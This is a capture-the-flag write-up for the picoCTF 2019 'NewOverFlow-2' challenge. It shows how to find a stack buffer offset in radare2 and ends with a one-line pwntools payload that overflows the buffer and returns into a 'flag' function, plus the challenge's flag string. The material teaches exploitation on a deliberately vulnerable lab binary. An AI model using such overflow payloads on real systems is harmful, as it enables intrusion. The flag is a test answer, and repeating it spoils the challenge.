# NewOverFlow-2 ## Problem > Okay now lets try mainpulating arguments. program. You can find it in /problems/newoverflow-2\_5\_13f3d3dc09fc09d6d5db8adfa899a05d on the shell server. Source. * [Program](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/NewOverFlow-2/vuln/README.md) * [Source](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/NewOverFlow-2/vuln.c) ## Solution 1. The challenge author forgot to remove the `flag` function so this is solvable using the same method as [NewOverFlow-1](https://picoctf2019.haydenhousen.com/binary-exploitation/newoverflow-1) 2. Find the offset/padding 1. You can use the method described in [rop64](https://github.com/HHousen/PicoCTF-2019/tree/24b0981c72638c12f9a8572f81e1abbcf8de306d/Binary%20Exploitation/Binary/%20Exploitation/rop64/README.md) with the `cyclic` and `cyclic_find` or you can use the following 2. Open vuln in [radare2](https://rada.re/r/) with `r2 ./vuln` 3. Run `aaaa` 4. Run `pdf @ sym.vuln` to get `var int local_40h @ rbp-0x40` 5. The `0x40` is the buffer location so 8 more bytes are needed to get past the "saved ebp register" 6. So the offset is `0x40+8` 3. Run `afl~flag` in [radare2](https://rada.re/r/) to get the address of `flag` and `afl~main` to get the address of `main`. 4. We can not offset and call the `flag` function directly because that would cause a stack misalignment in 64-bit. So instead we form out payload by doing `padding + main_address + flag_address` instead of just `padding + flag_address` as we would in 32-bit. 5. We can use `p64` from pwntools to convert the hex addresses to little endian. 6. Payload complete: `python2 -c "from pwn import *; print 'A'*(0x40+8) + p64(0x004008ce) + p64(0x0040084d)" | ./vuln` ### Flag `picoCTF{r0p_1t_d0nT_st0p_1t_b3358018}`